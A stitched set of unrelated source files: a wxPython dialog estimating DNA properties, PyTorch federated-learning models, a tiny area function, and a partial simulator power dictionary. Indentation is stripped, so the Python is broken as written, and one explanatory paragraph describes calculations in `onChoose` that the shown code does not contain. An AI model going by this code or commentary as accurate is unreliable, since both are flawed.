font = wx.Font(10, wx.DEFAULT, wx.NORMAL, wx.BOLD)
head.SetFont(font)
self.vBox.Add(head ,flag = wx.EXPAND | wx.TOP | wx.LEFT , border = 5)
line1 = wx.StaticLine(self, size=(300,1) , style = wx.ALIGN_CENTRE)
self.vBox.Add(line1, flag = wx.EXPAND | wx.TOP | wx.BOTTOM , border = 10)
self.hBox = wx.BoxSizer(wx.HORIZONTAL)
self.butChoose = wx.Button(self , label = "Choose File")
self.hBox.Add(self.butChoose,flag = wx.LEFT | wx.RIGHT | wx.ALIGN_CENTER_VERTICAL , border = 10,proportion = 1)
path = wx.StaticText(self, label = "Select a DNA file from your Computer",style = wx.ALIGN_CENTER_VERTICAL)
self.hBox.Add(path,flag = wx.ALIGN_CENTER_VERTICAL,proportion = 2)
self.vBox.Add(self.hBox)
self.hBox1 = wx.BoxSizer(wx.HORIZONTAL)
text1 = wx.StaticText(self, label = " Enter salt concentration(mM) :",style = wx.ALIGN_CENTER)
self.saltText = wx.TextCtrl(self,name = "Salt Concentration")
self.hBox1.Add(text1, 1, wx.EXPAND)
self.hBox1.Add(self.saltText, 2, wx.EXPAND | wx.LEFT , border = 15)
self.vBox.Add(self.hBox1,flag = wx.TOP | wx.BOTTOM , border = 5)
self.hBox2 = wx.BoxSizer(wx.HORIZONTAL)
text1 = wx.StaticText(self, label = " Enter cost for a base($) : \t\t",style = wx.ALIGN_CENTER)
self.priceText = wx.TextCtrl(self,name = "Price")
self.hBox2.Add(text1, 1, wx.EXPAND)
self.hBox2.Add(self.priceText, 2, wx.EXPAND | wx.LEFT, border = 15)
self.vBox.Add(self.hBox2,flag = wx.TOP | wx.BOTTOM , border = 5)
line2 = wx.StaticLine(self, size=(300,1) , style = wx.ALIGN_CENTRE)
self.vBox.Add(line2, flag = wx.EXPAND | wx.TOP | wx.BOTTOM , border = 15)
self.txt = wx.TextCtrl(self,name = "hBox",size = (200,250),style= wx.TE_READONLY | wx.TE_MULTILINE)
self.vBox.Add(self.txt,flag = wx.EXPAND | wx.ALL , border = 10)
head = wx.StaticText(self ,label = "Disclaimer: These values are approximations and the actual values may vary",style = wx.ALIGN_CENTER_HORIZONTAL)
font = wx.Font(8, wx.DEFAULT, wx.NORMAL, wx.BOLD)
head.SetFont(font)
self.vBox.Add(head ,flag = wx.EXPAND | wx.TOP | wx.LEFT |wx.ALIGN_CENTER_HORIZONTAL | wx.RIGHT, border = 10)
line2 = wx.StaticLine(self, size=(300,1) , style = wx.ALIGN_CENTRE)
self.vBox.Add(line2, flag = wx.EXPAND | wx.TOP | wx.BOTTOM , border = 15)
self.hBox3 = wx.BoxSizer(wx.HORIZONTAL)
self.butCalc = wx.Button(self , label = " Calculate ")
self.butCancel = wx.Button(self, label = " Close ")
self.butSave = wx.Button(self , label = " Save ")
self.hBox3.Add(self.butCalc, 1, wx.RIGHT , border = 5)
self.hBox3.Add(self.butSave, 1, wx.LEFT | wx.RIGHT , border = 5)
self.hBox3.Add(self.butCancel, 1, wx.LEFT , border = 5)
self.vBox.Add(self.hBox3,flag = wx.ALIGN_CENTER_HORIZONTAL | wx.TOP | wx.BOTTOM, border = 10)
self.SetSizerAndFit(self.vBox)
elif "linux" in sys.platform:
head = wx.StaticText(self ,label = "Estimate properties",style = wx.ALIGN_CENTER_HORIZONTAL)
font = wx.Font(10, wx.DEFAULT, wx.NORMAL, wx.BOLD)
head.SetFont(font)
self.vBox.Add(head ,flag = wx.EXPAND | wx.TOP | wx.LEFT , border = 5)
line1 = wx.StaticLine(self, size=(300,1) , style = wx.ALIGN_CENTRE)
self.vBox.Add(line1, flag = wx.EXPAND | wx.TOP | wx.BOTTOM , border = 10)
self.hBox = wx.BoxSizer(wx.HORIZONTAL)
self.butChoose = wx.Button(self , label = "Choose File")
self.hBox.Add(self.butChoose,flag = wx.LEFT | wx.RIGHT | wx.ALIGN_CENTER_VERTICAL , border = 10,proportion = 1)
path = wx.StaticText(self, label = "Select a DNA File from your File System",style = wx.ALIGN_CENTER_VERTICAL)
self.hBox.Add(path,flag = wx.ALIGN_CENTER_VERTICAL,proportion = 2)
self.vBox.Add(self.hBox)
self.hBox1 = wx.BoxSizer(wx.HORIZONTAL)
text1 = wx.StaticText(self, label = " Enter Na+ salt concentration (mM) :",style = wx.ALIGN_CENTER)
self.saltText = wx.TextCtrl(self,name = "Salt Concentration",size = (200,30))
self.hBox1.Add(text1)
self.hBox1.Add(self.saltText)
self.vBox.Add(self.hBox1,flag = wx.TOP | wx.BOTTOM , border = 5)
self.hBox2 = wx.BoxSizer(wx.HORIZONTAL)
text1 = wx.StaticText(self, label = " Enter base pair cost ($) :\t\t\t",style = wx.ALIGN_CENTER)
self.priceText = wx.TextCtrl(self,name = "Price",size = (200,30))
self.hBox2.Add(text1)
self.hBox2.Add(self.priceText)
self.vBox.Add(self.hBox2,flag = wx.TOP | wx.BOTTOM , border = 5)
line2 = wx.StaticLine(self, size=(300,1) , style = wx.ALIGN_CENTRE)
self.vBox.Add(line2, flag = wx.EXPAND | wx.TOP | wx.BOTTOM , border = 15)
self.txt = wx.TextCtrl(self,name = "hBox",size = (200,250),style= wx.TE_READONLY | wx.TE_MULTILINE)
self.vBox.Add(self.txt,flag = wx.EXPAND | wx.ALL , border = 10)
head = wx.StaticText(self ,label = "Disclaimer: These values are approximations and the actual values may vary",style = wx.ALIGN_CENTER_HORIZONTAL)
font = wx.Font(8, wx.DEFAULT, wx.NORMAL, wx.BOLD)
head.SetFont(font)
self.vBox.Add(head ,flag = wx.EXPAND | wx.TOP | wx.LEFT |wx.ALIGN_CENTER_HORIZONTAL | wx.RIGHT, border = 10)
line2 = wx.StaticLine(self, size=(300,1) , style = wx.ALIGN_CENTRE)
self.vBox.Add(line2, flag = wx.EXPAND | wx.TOP | wx.BOTTOM , border = 15)
self.hBox3 = wx.BoxSizer(wx.HORIZONTAL)
self.butCalc = wx.Button(self , label = "Calculate")
self.butCancel = wx.Button(self, label = "Close")
self.butSave = wx.Button(self , label = "Save")
self.hBox3.Add(self.butCalc,proportion = 1)
self.hBox3.Add(self.butSave,proportion = 1)
self.hBox3.Add(self.butCancel,proportion = 1)
self.vBox.Add(self.hBox3,flag = wx.ALIGN_CENTER_HORIZONTAL | wx.TOP | wx.BOTTOM, border = 5)
self.SetSizer(self.vBox)
self.SetSize((500,580))
elif "darwin" in sys.platform:
head = wx.StaticText(self ,label = "Estimate properties",style = wx.ALIGN_CENTER_HORIZONTAL)
font = wx.Font(16, wx.DEFAULT, wx.NORMAL, wx.BOLD)
head.SetFont(font)
self.vBox.Add(head ,flag = wx.EXPAND | wx.TOP | wx.LEFT , border = 8)
line1 = wx.StaticLine(self, size=(300,1) , style = wx.ALIGN_CENTRE)
self.vBox.Add(line1, flag = wx.EXPAND | wx.TOP | wx.BOTTOM , border = 10)
self.hBox = wx.BoxSizer(wx.HORIZONTAL)
self.butChoose = wx.Button(self , label = "Choose File")
self.hBox.Add(self.butChoose,flag = wx.LEFT | wx.RIGHT | wx.ALIGN_CENTER_VERTICAL , border = 10,proportion = 1)
path = wx.StaticText(self, label = "Select a DNA File from your File System",style = wx.ALIGN_CENTER_VERTICAL)
self.hBox.Add(path,flag = wx.ALIGN_CENTER_VERTICAL,proportion = 2)
self.vBox.Add(self.hBox)
self.hBox1 = wx.BoxSizer(wx.HORIZONTAL)
text1 = wx.StaticText(self, label = " Enter Na+ salt concentration (mM) :\t",style = wx.ALIGN_CENTER)
self.saltText = wx.TextCtrl(self,name = "Salt Concentration",size = (200,25))
self.hBox1.Add(text1)
self.hBox1.Add(self.saltText)
self.vBox.Add(self.hBox1,flag = wx.TOP | wx.BOTTOM , border = 8)
self.hBox2 = wx.BoxSizer(wx.HORIZONTAL)
text1 = wx.StaticText(self, label = " Enter base pair cost ($) :\t\t\t\t",style = wx.ALIGN_CENTER)
self.priceText = wx.TextCtrl(self,name = "Price",size = (200,25))
self.hBox2.Add(text1)
self.hBox2.Add(self.priceText)
self.vBox.Add(self.hBox2,flag = wx.TOP | wx.BOTTOM , border = 8)
line2 = wx.StaticLine(self, size=(300,1) , style = wx.ALIGN_CENTRE)
self.vBox.Add(line2, flag = wx.EXPAND | wx.TOP | wx.BOTTOM , border = 15)
self.txt = wx.TextCtrl(self,name = "hBox",size = (200,250),style= wx.TE_READONLY | wx.TE_MULTILINE)
self.vBox.Add(self.txt,flag = wx.EXPAND | wx.ALL , border = 10)
head = wx.StaticText(self ,label = "Disclaimer: These values are approximations and the actual values may vary",style = wx.ALIGN_CENTER_HORIZONTAL)
font = wx.Font(12, wx.DEFAULT, wx.NORMAL, wx.BOLD)
head.SetFont(font)
self.vBox.Add(head ,flag = wx.EXPAND | wx.TOP | wx.LEFT |wx.ALIGN_CENTER_HORIZONTAL | wx.RIGHT, border = 10)
line2 = wx.StaticLine(self, size=(300,1) , style = wx.ALIGN_CENTRE)
self.vBox.Add(line2, flag = wx.EXPAND | wx.TOP | wx.BOTTOM , border = 15)
self.hBox3 = wx.BoxSizer(wx.HORIZONTAL)
self.butCalc = wx.Button(self , label = "Calculate")
self.butCancel = wx.Button(self, label = "Close")
self.butSave = wx.Button(self , label = "Save")
self.hBox3.Add(self.butCalc,proportion = 1, flag = wx.LEFT | wx.RIGHT , border = 5)
self.hBox3.Add(self.butSave,proportion = 1, flag = wx.LEFT | wx.RIGHT , border = 5)
self.hBox3.Add(self.butCancel,proportion = 1, flag = wx.LEFT | wx.RIGHT , border = 5)
self.vBox.Add(self.hBox3,flag = wx.ALIGN_CENTER_HORIZONTAL | wx.TOP | wx.BOTTOM, border = 5)
self.SetSizer(self.vBox)
self.SetSize((500,580))
self.butChoose.Bind(wx.EVT_BUTTON,self.onChoose)
self.butCancel.Bind(wx.EVT_BUTTON,self.onCancel)
self.butCalc.Bind(wx.EVT_BUTTON,self.calc)
self.butSave.Bind(wx.EVT_BUTTON,self.onSave)
self.butSave.Disable()
self.path = None
def onChoose(self,e):
self.butSave.Disable()
self.txt.Clear()
self.priceText.Clear()
self.saltText.Clear()
fileSelector = wx.FileDialog(self, message="Choose a file",defaultFile="",style=wx.OPEN | wx.MULTIPLE | wx.CHANGE_DIR )
if fileSelector.ShowModal() == wx.ID_OK:
paths = fileSelector.GetPaths()
self.path = unicodedata.normalize('NFKD', paths[0]).encode('ascii','ignore')
self.txt.WriteText("#File Selected : " + self.path)
fileSelector.Destroy()
def calc(self,e):
self.txt.Clear()
if self.path is not None:
if not self.saltText.IsEmpty() and not self.priceText.IsEmpty() and FILE_EXT in self.path:
"""
tempTuple = extraModules.getGCContent(self.path)
noOfGCPairs = tempTuple[0]; self.minGC = (tempTuple[1] * 100)/OLIGO_SIZE; self.maxGC = (tempTuple[2] * 100)/OLIGO_SIZE
print tempTuple[0] , tempTuple[1] , tempTuple[2]
totalPairs = os.path.getsize(PATH + "/../.temp/dnaString.txt")
self.GCContent = (noOfGCPairs * 100)/totalPairs
self.totalCost = int(self.priceText.GetString(0,self.priceText.GetLastPosition())) * totalPairs
naContent = int(self.saltText.GetString(0,self.saltText.GetLastPosition()))
self.minMeltingPoint = (81.5 + 16.6 * math.log10(naContent) + 0.41 * (self.minGC) - 600)/OLIGO_SIZE
self.maxMeltingPoint = (81.5 + 16.6 * math.log10(naContent) + 0.41 * (self.maxGC) - 600)/OLIGO_SIZE
self.details = "#Details for the DNA :\n\n- GC Content(% in DNA String):\t\t\t" + `self.GCContent` + "\n- Total Cost($ of DNA String):\t\t\t" + `self.totalCost` + "\n- Min Melting Point(℃/nucleotide):\t" + str(self.minMeltingPoint) + "\n- Max Melting Point(℃/nucleotide):\t" + str(self.maxMeltingPoint)
"""
con = sqlite3.connect(PATH + '/../database/prefs.db')
with con:
cur = con.cursor()
WORKSPACE_PATH = cur.execute('SELECT * FROM prefs WHERE id = 8').fetchone()[1]
if "linux" in sys.platform:
WORKSPACE_PATH = unicodedata.normalize('NFKD', WORKSPACE_PATH).encode('ascii','ignore')
if not os.path.isdir(WORKSPACE_PATH + '/.temp'):
os.mkdir(WORKSPACE_PATH + '/.temp')
try:
float(self.saltText.GetString(0,self.saltText.GetLastPosition()))
float(self.priceText.GetString(0,self.priceText.GetLastPosition()))
except ValueError:
wx.MessageDialog(self,'Please enter numbers, not letters', 'Error',wx.OK | wx.ICON_ERROR | wx.STAY_ON_TOP).ShowModal()
return
self.naContent = float(self.saltText.GetString(0,self.saltText.GetLastPosition()))
self.costPerBase = float(self.priceText.GetString(0,self.priceText.GetLastPosition()))
if 'darwin' in sys.platform:
p = threading.Thread(name = "GC Content Grabber", target = extraModules.getGCContent, args = (self.path,self.costPerBase,self.naContent,))
else:
p = multiprocessing.Process(target = extraModules.getGCContent , args = (self.path,self.costPerBase,self.naContent,) , name = "Checking Details Process")
p.start()
temp = wx.ProgressDialog('Please wait...','Analysing the String....This may take a while....' ,parent = self,style = wx.PD_APP_MODAL | wx.PD_CAN_ABORT | wx.PD_ELAPSED_TIME)
terminated = False
temp.SetSize((450,180))
if 'darwin' in sys.platform:
while p.isAlive():
time.sleep(0.1)
if not temp.UpdatePulse("Analysing the File....This may take several minutes...\n\tso sit back and relax.....")[0]:
wx.MessageDialog(self,'This operation cannot be stopped. Sorry.', 'Information!',wx.OK | wx.ICON_INFORMATION | wx.STAY_ON_TOP).ShowModal()
temp.Destroy()
if not p.isAlive():
p.join()
else:
while len(multiprocessing.active_children()) != 0:
time.sleep(0.1)
if not temp.UpdatePulse("Analysing the File....This may take several minutes...\n\tso sit back and relax.....")[0]:
p.terminate()
terminated = True
break
p.join()
temp.Destroy()
p.terminate()
if not terminated:
tempFile = open(WORKSPACE_PATH + "/.temp/details.txt","rb")
self.details = tempFile.read()
self.txt.WriteText(self.details)
tempFile.close()
self.butSave.Enable()
else:
wx.MessageDialog(self,'Make sure you have filled in the required details and selected a .dnac file', 'Error',wx.OK | wx.ICON_ERROR | wx.STAY_ON_TOP).ShowModal()
else:
wx.MessageDialog(self,'Make sure you have selected a .dnac file', 'Error',wx.OK | wx.ICON_ERROR | wx.STAY_ON_TOP).ShowModal()
def onSave(self,e):
con = sqlite3.connect(PATH + '/../database/prefs.db')
with con:
cur = con.cursor()
WORKSPACE_PATH = cur.execute('SELECT * FROM prefs WHERE id = 8').fetchone()[1]
if "linux" in sys.platform:
WORKSPACE_PATH = unicodedata.normalize('NFKD', WORKSPACE_PATH).encode('ascii','ignore')
if not os.path.isdir(WORKSPACE_PATH + '/.temp'):
os.mkdir(WORKSPACE_PATH +'/.temp')
## if string == 'None':
## locationSelector = wx.FileDialog(self,"Please select location to save your details",style = wx.FD_SAVE | wx.FD_OVERWRITE_PROMPT)
## if locationSelector.ShowModal() == wx.ID_OK:
## paths = locationSelector.GetPath()
## self.savePath = paths
##
## propFile = file(self.savePath + ".txt","w")
## propFile.write("#Input Details:-\n\n- Salt Concentration :\t\t" + str(self.naContent) + "\n- Cost per Base :\t\t" + str(self.costPerBase) + "\n\n" + self.details)
## #propFile.write("\n\n\n © 2013 - GUPTA RESEARCH LABS - Generated by DNA-CLOUD")
##
## wx.MessageDialog(self,'Details written to file', 'Info',wx.OK | wx.ICON_INFORMATION | wx.STAY_ON_TOP).ShowModal()
## else:
## locationSelector.Destroy()
## del locationSelector
xtime = datetime.now().timetuple()
self.savePath = WORKSPACE_PATH + "/details_encodedFile_" + str(xtime[2]) + "_" + str(xtime[1]) + "_" + str(xtime[0])
propFile = open(self.savePath + ".txt","w")
propFile.write("#Input Details:-\n\n- Salt Concentration :\t\t" + str(self.naContent) + "\n- Cost per Base :\t\t" + str(self.costPerBase) + "\n\n" + self.details)
propFile.close()
wx.MessageDialog(self,'Details written to file', 'Info',wx.OK | wx.ICON_INFORMATION | wx.STAY_ON_TOP).ShowModal()
def onCancel(self,e):
self.Destroy()
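The size and memory estimates computed in `onChoose` above, and the commented-out salt-adjusted melting-point formula in `calc`, can be sketched as standalone helpers. `CHUNK_SIZE` and `OLIGO_SIZE` are not defined in this excerpt, so the 1 MiB chunk size is an assumption; likewise, the melting-point helper uses the textbook form of the formula, which divides only the 600 term by the oligo length, whereas the commented-out code divides the entire expression by `OLIGO_SIZE`.

```python
import math

# Assumption: CHUNK_SIZE is 1 MiB in bytes; the constant is not defined in this excerpt.
CHUNK_SIZE = 1024 * 1024

def estimate_requirements(length):
    """Mirror the arithmetic in onChoose: (DNA length, string mem MB, chunk-list mem MB)."""
    dna_length = int(5.5 * length)
    string_mem = max(1, (6 * length) // CHUNK_SIZE)
    list_mem = max(1, ((dna_length // 25 - 3) * 117) // CHUNK_SIZE)
    return dna_length, string_mem, list_mem

def melting_point(gc_percent, na_mM, oligo_len):
    """Textbook salt-adjusted Tm in Celsius: only the 600 term is divided by length."""
    return 81.5 + 16.6 * math.log10(na_mM / 1000.0) + 0.41 * gc_percent - 600.0 / oligo_len
```

For example, a 1 MB input file maps to a 5.5 MB DNA string, and a 25-mer with 50% GC in 50 mM Na+ comes out near 56 °C under this form of the formula.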
# models/Models.py — martisak/federated-learning-mixture (MIT license)
import torch
from torch import nn
import torch.nn.functional as F
class MyEnsemble(nn.Module):
def __init__(self, modelA, modelB):
super().__init__()
self.modelA = modelA
self.modelB = modelB
# self.classifier = nn.Linear(noClasses * 2, noClasses)
self.activation = nn.LogSoftmax(dim=1)
def forward(self, x):
with torch.no_grad():
x1, _ = self.modelA(x)
x2, _ = self.modelB(x)
#x = torch.cat((x1, x2), dim=1)
#x = self.classifier(F.relu(x))
out = self.activation(x1 + x2)
return 0, out
class MLP(nn.Module):
def __init__(self, dim_in, dim_hidden, dim_out):
super(MLP, self).__init__()
self.layer_input = nn.Linear(dim_in, dim_hidden)
self.relu = nn.ReLU()
self.dropout = nn.Dropout()
self.layer_hidden = nn.Linear(dim_hidden, dim_out)
self.activation = nn.LogSoftmax(dim=1)
def forward(self, x):
x = x.view(-1, x.shape[1] * x.shape[-2] * x.shape[-1])
x = self.layer_input(x)
x = self.dropout(x)
x = self.relu(x)
x = self.layer_hidden(x)
x = self.activation(x)
return x
class MLP2(nn.Module):
def __init__(self, dim_in, dim_hidden, dim_out):
super(MLP2, self).__init__()
self.layer_input = nn.Linear(dim_in, dim_hidden)
self.relu = nn.ReLU()
self.dropout = nn.Dropout()
self.layer_hidden = nn.Linear(dim_hidden, dim_out)
self.activation = nn.LogSoftmax(dim=1)
def forward(self, x):
x = self.layer_input(x)
x = self.dropout(x)
x = self.relu(x)
x = self.layer_hidden(x)
x = self.activation(x)
return x
class GateMLP(nn.Module):
def __init__(self, dim_in, dim_hidden, dim_out):
super(GateMLP, self).__init__()
self.layer_input = nn.Linear(dim_in, dim_hidden)
self.relu = nn.ReLU()
self.dropout = nn.Dropout()
self.layer_hidden = nn.Linear(dim_hidden, dim_out)
self.activation = nn.Sigmoid()
def forward(self, x):
x = x.view(-1, x.shape[1] * x.shape[-2] * x.shape[-1])
x = self.layer_input(x)
x = self.dropout(x)
x = self.relu(x)
x = self.layer_hidden(x)
x = self.activation(x)
return x
class CNNLeafFEMNIST(nn.Module):
"""
Model from LEAF paper, but with dropout
"""
def __init__(self, args):
super().__init__()
self.conv1 = nn.Conv2d(1, 32, 5)
self.pool = nn.MaxPool2d(2, 2)
self.conv2 = nn.Conv2d(32, 64, 5)
self.fc1 = nn.Linear(64 * 4 * 4, 512)
self.dropout = nn.Dropout()
self.fc2 = nn.Linear(512, args.num_classes)
self.activation = nn.LogSoftmax(dim=1)
def forward(self, x):
"""
Forward pass
"""
x = self.pool(F.relu(self.conv1(x)))
x = self.pool(F.relu(self.conv2(x)))
x = x.view(-1, 64 * 4 * 4)
x = F.relu(self.fc1(x))
x = self.dropout(x)
out1 = F.relu(self.fc2(x))
out2 = self.activation(out1)
return out1, out2
class GateCNNLeaf(nn.Module):
def __init__(self):
super().__init__()
self.conv1 = nn.Conv2d(3, 32, 5)
self.pool = nn.MaxPool2d(2, 2)
self.conv2 = nn.Conv2d(32, 64, 5)
self.fc1 = nn.Linear(64 * 5 * 5, 512)
self.dropout = nn.Dropout()
self.fc2 = nn.Linear(512, 1)
self.activation = nn.Sigmoid()
def forward(self, x):
x = self.pool(F.relu(self.conv1(x)))
x = self.pool(F.relu(self.conv2(x)))
x = x.view(-1, 64 * 5 * 5)
x = F.relu(self.fc1(x))
x = self.dropout(x)
x = F.relu(self.fc2(x))
x = self.activation(x)
return x
class GateCNNFEMNIST(nn.Module):
def __init__(self):
super().__init__()
self.conv1 = nn.Conv2d(1, 32, 5)
self.pool = nn.MaxPool2d(2, 2)
self.conv2 = nn.Conv2d(32, 64, 5)
self.fc1 = nn.Linear(64 * 4 * 4, 512)
self.dropout = nn.Dropout()
self.fc2 = nn.Linear(512, 1)
self.activation = nn.Sigmoid()
def forward(self, x):
x = self.pool(F.relu(self.conv1(x)))
x = self.pool(F.relu(self.conv2(x)))
x = x.view(-1, 64 * 4 * 4)
x = F.relu(self.fc1(x))
x = self.dropout(x)
x = F.relu(self.fc2(x))
x = self.activation(x)
return x
class CNNLeaf(nn.Module):
"""
Model from LEAF paper, but with dropout
"""
def __init__(self, args):
super().__init__()
self.conv1 = nn.Conv2d(3, 32, 5)
self.pool = nn.MaxPool2d(2, 2)
self.conv2 = nn.Conv2d(32, 64, 5)
self.fc1 = nn.Linear(64 * 5 * 5, 512)
self.dropout = nn.Dropout()
self.fc2 = nn.Linear(512, args.num_classes)
self.activation = nn.LogSoftmax(dim=1)
def forward(self, x):
"""
Forward pass
"""
x = self.pool(F.relu(self.conv1(x)))
x = self.pool(F.relu(self.conv2(x)))
x = x.view(-1, 64 * 5 * 5)
x = F.relu(self.fc1(x))
x = self.dropout(x)
out1 = F.relu(self.fc2(x))
out2 = self.activation(out1)
return out1, out2
class CNNCifar(nn.Module):
def __init__(self, args):
super(CNNCifar, self).__init__()
self.conv1 = nn.Conv2d(3, 6, 5)
self.pool = nn.MaxPool2d(2, 2)
self.conv2 = nn.Conv2d(6, 16, 5)
self.conv2_drop = nn.Dropout2d(p=0.5)
self.fc1 = nn.Linear(16 * 5 * 5, 120)
self.dropout = nn.Dropout()
self.fc2 = nn.Linear(120, 84)
self.fc3 = nn.Linear(84, args.num_classes)
self.activation = nn.LogSoftmax(dim=1)
def forward(self, x):
x = self.pool(F.relu(self.conv1(x)))
x = self.pool(F.relu(self.conv2(x)))
x = x.view(-1, 16 * 5 * 5)
x = F.relu(self.fc1(x))
x = self.dropout(x)
out1 = F.relu(self.fc2(x))
x = self.fc3(out1)
out2 = self.activation(x)
return out1, out2
class GateCNN(nn.Module):
def __init__(self, args):
super(GateCNN, self).__init__()
self.conv1 = nn.Conv2d(3, 6, 5)
self.pool = nn.MaxPool2d(2, 2)
self.conv2 = nn.Conv2d(6, 16, 5)
#self.conv2_drop = nn.Dropout2d()
self.fc1 = nn.Linear(16 * 5 * 5, 120)
self.dropout = nn.Dropout()
self.fc2 = nn.Linear(120, 84)
self.fc3 = nn.Linear(84, 1)
self.activation = nn.Sigmoid()
def forward(self, x):
x = self.pool(F.relu(self.conv1(x)))
x = self.pool(F.relu(self.conv2(x)))
x = x.view(-1, 16 * 5 * 5)
x = F.relu(self.fc1(x))
x = self.dropout(x)
x = F.relu(self.fc2(x))
x = self.fc3(x)
x = self.activation(x)
return x
class GateCNNSoftmax(nn.Module):
def __init__(self, args):
super(GateCNNSoftmax, self).__init__()
self.conv1 = nn.Conv2d(3, 6, 5)
self.pool = nn.MaxPool2d(2, 2)
self.conv2 = nn.Conv2d(6, 16, 5)
self.conv2_drop = nn.Dropout2d()
self.fc1 = nn.Linear(16 * 5 * 5, 120)
self.fc2 = nn.Linear(120, 84)
self.fc3 = nn.Linear(84, 3)
self.activation = nn.Softmax(dim=1)
def forward(self, x):
x = self.pool(F.relu(self.conv1(x)))
x = self.pool(F.relu(self.conv2(x)))
x = x.view(-1, 16 * 5 * 5)
x = F.relu(self.fc1(x))
x = F.relu(self.fc2(x))
x = self.fc3(x)
x = self.activation(x)
return x
class CNNFashion(nn.Module):
def __init__(self, args):
super(CNNFashion, self).__init__()
self.conv1 = nn.Conv2d(1, 6, 5)
self.pool = nn.MaxPool2d(2, 2)
self.conv2 = nn.Conv2d(6, 12, 5)
self.conv2_drop = nn.Dropout2d()
self.fc1 = nn.Linear(12 * 4 * 4, 84)
self.dropout = nn.Dropout()
self.fc2 = nn.Linear(84, 42)
self.fc3 = nn.Linear(42, args.num_classes)
self.activation = nn.LogSoftmax(dim=1)
def forward(self, x):
x = self.pool(F.relu(self.conv1(x)))
x = self.pool(F.relu(self.conv2(x)))
x = x.view(-1, 12 * 4 * 4)
x = F.relu(self.fc1(x))
x = self.dropout(x)
out1 = F.relu(self.fc2(x))
x = self.fc3(out1)
out2 = self.activation(x)
return out1, out2
class GateCNNFashion(nn.Module):
def __init__(self, args):
super(GateCNNFashion, self).__init__()
self.conv1 = nn.Conv2d(1, 6, 5)
self.pool = nn.MaxPool2d(2, 2)
self.conv2 = nn.Conv2d(6, 12, 5)
self.conv2_drop = nn.Dropout2d()
self.fc1 = nn.Linear(12 * 4 * 4, 84)
self.dropout = nn.Dropout()
self.fc2 = nn.Linear(84, 42)
self.fc3 = nn.Linear(42, 1)
self.activation = nn.Sigmoid()
def forward(self, x):
x = self.pool(F.relu(self.conv1(x)))
x = self.pool(F.relu(self.conv2(x)))
x = x.view(-1, 12 * 4 * 4)
x = F.relu(self.fc1(x))
x = self.dropout(x)
x = F.relu(self.fc2(x))
x = self.fc3(x)
x = self.activation(x)
return x
class GateCNNFashionSoftmax(nn.Module):
def __init__(self, args):
super(GateCNNFashionSoftmax, self).__init__()
self.conv1 = nn.Conv2d(1, 6, 5)
self.pool = nn.MaxPool2d(2, 2)
self.conv2 = nn.Conv2d(6, 12, 5)
self.conv2_drop = nn.Dropout2d()
self.fc1 = nn.Linear(12 * 4 * 4, 84)
self.fc2 = nn.Linear(84, 42)
self.fc3 = nn.Linear(42, 3)
self.activation = nn.Softmax(dim=1)
def forward(self, x):
x = self.pool(F.relu(self.conv1(x)))
x = self.pool(F.relu(self.conv2(x)))
x = x.view(-1, 12 * 4 * 4)
x = F.relu(self.fc1(x))
x = F.relu(self.fc2(x))
x = self.fc3(x)
x = self.activation(x)
return x
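The hard-coded flatten sizes in these models (`64 * 4 * 4` for 28×28 FEMNIST inputs, `64 * 5 * 5` for 32×32 CIFAR inputs, and so on) all follow from stacking 5×5 valid convolutions with 2×2 max pooling. A small hypothetical helper (not part of the repo) makes the arithmetic explicit:

```python
def flatten_size(side, channels, blocks=2, kernel=5, pool=2):
    # Each block: a 'valid' kernel x kernel convolution, then pool x pool max pooling.
    for _ in range(blocks):
        side = (side - kernel + 1) // pool
    return channels * side * side

# 28x28 FEMNIST through two conv+pool blocks ending in 64 channels -> 64 * 4 * 4
assert flatten_size(28, 64) == 64 * 4 * 4
# 32x32 CIFAR through the same stack -> 64 * 5 * 5
assert flatten_size(32, 64) == 64 * 5 * 5
```

The same helper reproduces `16 * 5 * 5` in CNNCifar (32×32 input, 16 channels) and `12 * 4 * 4` in CNNFashion (28×28 input, 12 channels).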
# W7/D2/func_area.py — Nasfame/Assignments-Masai (MIT license)
def ar(n1,n2):
return n1 * n2, n1 + n2
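A quick usage sketch (the function is redefined here so the snippet is self-contained): `ar` returns the product and the sum of its two arguments as a tuple — if `n1` and `n2` are rectangle sides, that is the area and half the perimeter.

```python
def ar(n1, n2):
    # Mirrors W7/D2/func_area.py: product and sum of the two inputs.
    return n1 * n2, n1 + n2

area, half_perimeter = ar(3, 4)  # -> (12, 7)
```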
# benchmarks/SimResults/micro_pinned_train_combos/cmpB_soplexmcfcalculixgcc/power.py — TugberkArkose/MLScheduler (Unlicense)
power = {'BUSES': {'Area': 1.33155,
'Bus/Area': 1.33155,
'Bus/Gate Leakage': 0.00662954,
'Bus/Peak Dynamic': 0.0,
'Bus/Runtime Dynamic': 0.0,
'Bus/Subthreshold Leakage': 0.0691322,
'Bus/Subthreshold Leakage with power gating': 0.0259246,
'Gate Leakage': 0.00662954,
'Peak Dynamic': 0.0,
'Runtime Dynamic': 0.0,
'Subthreshold Leakage': 0.0691322,
'Subthreshold Leakage with power gating': 0.0259246},
'Core': [{'Area': 32.6082,
'Execution Unit/Area': 8.2042,
'Execution Unit/Complex ALUs/Area': 0.235435,
'Execution Unit/Complex ALUs/Gate Leakage': 0.0132646,
'Execution Unit/Complex ALUs/Peak Dynamic': 5.66814e-06,
'Execution Unit/Complex ALUs/Runtime Dynamic': 0.202693,
'Execution Unit/Complex ALUs/Subthreshold Leakage': 0.20111,
'Execution Unit/Complex ALUs/Subthreshold Leakage with power gating': 0.0754163,
'Execution Unit/Floating Point Units/Area': 4.6585,
'Execution Unit/Floating Point Units/Gate Leakage': 0.0656156,
'Execution Unit/Floating Point Units/Peak Dynamic': 2.02403e-05,
'Execution Unit/Floating Point Units/Runtime Dynamic': 0.304033,
'Execution Unit/Floating Point Units/Subthreshold Leakage': 0.994829,
'Execution Unit/Floating Point Units/Subthreshold Leakage with power gating': 0.373061,
'Execution Unit/Gate Leakage': 0.122718,
'Execution Unit/Instruction Scheduler/Area': 2.17927,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Area': 0.328073,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Gate Leakage': 0.00115349,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Peak Dynamic': 1.20978,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Runtime Dynamic': 0.357856,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Subthreshold Leakage': 0.017004,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Subthreshold Leakage with power gating': 0.00962066,
'Execution Unit/Instruction Scheduler/Gate Leakage': 0.00730101,
'Execution Unit/Instruction Scheduler/Instruction Window/Area': 1.00996,
